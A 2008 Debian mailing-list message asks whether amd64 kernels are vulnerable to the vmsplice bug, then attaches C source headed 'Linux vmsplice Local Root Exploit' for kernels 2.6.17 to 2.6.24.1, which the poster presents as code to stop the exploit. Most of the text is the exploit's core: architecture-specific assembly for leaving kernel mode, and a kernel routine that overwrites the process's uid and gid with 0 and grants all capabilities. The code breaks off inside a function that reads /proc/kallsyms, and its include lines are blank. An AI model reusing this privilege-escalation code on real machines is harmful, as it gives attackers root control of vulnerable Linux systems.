On Mon, Feb 11, 2008 at 02:02:40PM +1100, Alex Samad wrote:
> On Mon, Feb 11, 2008 at 01:21:42AM +, Stephen Gran wrote:
> > This one time, at band camp, Alex Samad said:
> > > Hi
> > >
> > > http://it.slashdot.org/article.pl?sid=08/02/10/2011257 &
> > > http://bugs.debian.org/cgi-bin/bugreport.cgi?bug=464953
> > >
> > > is the amd64 kernel susceptible to this ?
> >
> > Yes, expect a DSA soon.
> there was a stop the exploit in the bug report, but it doesn't seem to be
> available any more, but there was a question about it being only i386
from the debian-user list (attached code to stop the exploit)
>
>
> > --
> > -
> > | ,''`.Stephen Gran |
> > | : :' :[EMAIL PROTECTED] |
> > | `. `'Debian user, admin, and developer |
> > |`- http://www.debian.org |
> > -
>
>
>
> --
> Baseball is a skilled game. It's America's game - it, and high taxes.
> -- The Best of Will Rogers
--
"This case has had full analyzation and has been looked at a lot. I understand
the emotionality of death penalty cases."
- George W. Bush
06/23/2000
Seattle Post-Intelligencer
/*
* Linux vmsplice Local Root Exploit
* By qaaz
*
* Linux 2.6.17 - 2.6.24.1
*/
#define _GNU_SOURCE
#include
#include
#include
#include
#include
#include
#include
#include
#include
#include
#include
#include
#define __KERNEL__
#include
#define PIPE_BUFFERS16
#define PG_compound 14
#define uintunsigned int
#define static_inline static inline __attribute__((always_inline))
#define STACK(x)(x + sizeof(x) - 40)
struct page {
unsigned long flags;
int count;
int mapcount;
unsigned long private;
void *mapping;
unsigned long index;
struct { long next, prev; } lru;
};
voidexit_code();
charexit_stack[1024 * 1024];
voiddie(char *msg, int err)
{
printf(err ? "[-] %s: %s\n" : "[-] %s\n", msg, strerror(err));
fflush(stdout);
fflush(stderr);
exit(1);
}
#if defined (__i386__)
#ifndef __NR_vmsplice
#define __NR_vmsplice 316
#endif
#define USER_CS 0x73
#define USER_SS 0x7b
#define USER_FL 0x246
static_inline
voidexit_kernel()
{
__asm__ __volatile__ (
"movl %0, 0x10(%%esp) ;"
"movl %1, 0x0c(%%esp) ;"
"movl %2, 0x08(%%esp) ;"
"movl %3, 0x04(%%esp) ;"
"movl %4, 0x00(%%esp) ;"
"iret"
: : "i" (USER_SS), "r" (STACK(exit_stack)), "i" (USER_FL),
"i" (USER_CS), "r" (exit_code)
);
}
static_inline
void * get_current()
{
unsigned long curr;
__asm__ __volatile__ (
"movl %%esp, %%eax ;"
"andl %1, %%eax ;"
"movl (%%eax), %0"
: "=r" (curr)
: "i" (~8191)
);
return (void *) curr;
}
#elif defined (__x86_64__)
#ifndef __NR_vmsplice
#define __NR_vmsplice 278
#endif
#define USER_CS 0x23
#define USER_SS 0x2b
#define USER_FL 0x246
static_inline
voidexit_kernel()
{
__asm__ __volatile__ (
"swapgs ;"
"movq %0, 0x20(%%rsp) ;"
"movq %1, 0x18(%%rsp) ;"
"movq %2, 0x10(%%rsp) ;"
"movq %3, 0x08(%%rsp) ;"
"movq %4, 0x00(%%rsp) ;"
"iretq"
: : "i" (USER_SS), "r" (STACK(exit_stack)), "i" (USER_FL),
"i" (USER_CS), "r" (exit_code)
);
}
static_inline
void * get_current()
{
unsigned long curr;
__asm__ __volatile__ (
"movq %%gs:(0), %0"
: "=r" (curr)
);
return (void *) curr;
}
#else
#error "unsupported arch"
#endif
#if defined (_syscall4)
#define __NR__vmsplice __NR_vmsplice
_syscall4(
long, _vmsplice,
int, fd,
struct iovec *, iov,
unsigned long, nr_segs,
unsigned int, flags)
#else
#define _vmsplice(fd,io,nr,fl) syscall(__NR_vmsplice, (fd), (io), (nr), (fl))
#endif
static uint uid, gid;
voidkernel_code()
{
int i;
uint*p = get_current();
for (i = 0; i < 1024-13; i++) {
if (p[0] == uid && p[1] == uid &&
p[2] == uid && p[3] == uid &&
p[4] == gid && p[5] == gid &&
p[6] == gid && p[7] == gid) {
p[0] = p[1] = p[2] = p[3] = 0;
p[4] = p[5] = p[6] = p[7] = 0;
p = (uint *) ((char *)(p + 8) + sizeof(void *));
p[0] = p[1] = p[2] = ~0;
break;
}
p++;
}
exit_kernel();
}
voidde_exploit()
{
char line[4096];
FILE* ksyms = fopen("/proc/kallsyms", "r");
size_t address = 0;